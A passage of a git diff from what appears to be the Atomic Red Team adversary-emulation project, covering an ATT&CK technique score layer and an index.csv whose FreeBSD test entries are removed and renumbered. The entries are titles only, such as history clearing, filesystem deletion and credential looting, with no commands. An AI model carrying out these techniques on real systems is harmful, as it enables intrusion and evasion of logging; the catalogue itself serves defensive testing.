Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":111,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index fa3090e86..bfa21f2da 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -130,24 +130,17 @@ defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,17,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,18,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,19,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -513,10 +506,9 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Filesystem - FreeBSD,b5aaca7e-a48f-4f1b-8f0f-a27b8f516608,sh
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
 defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
@@ -564,11 +556,10 @@ defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing us
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
 defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -814,11 +805,10 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existi
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -909,14 +899,10 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
 execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
-execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
-execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
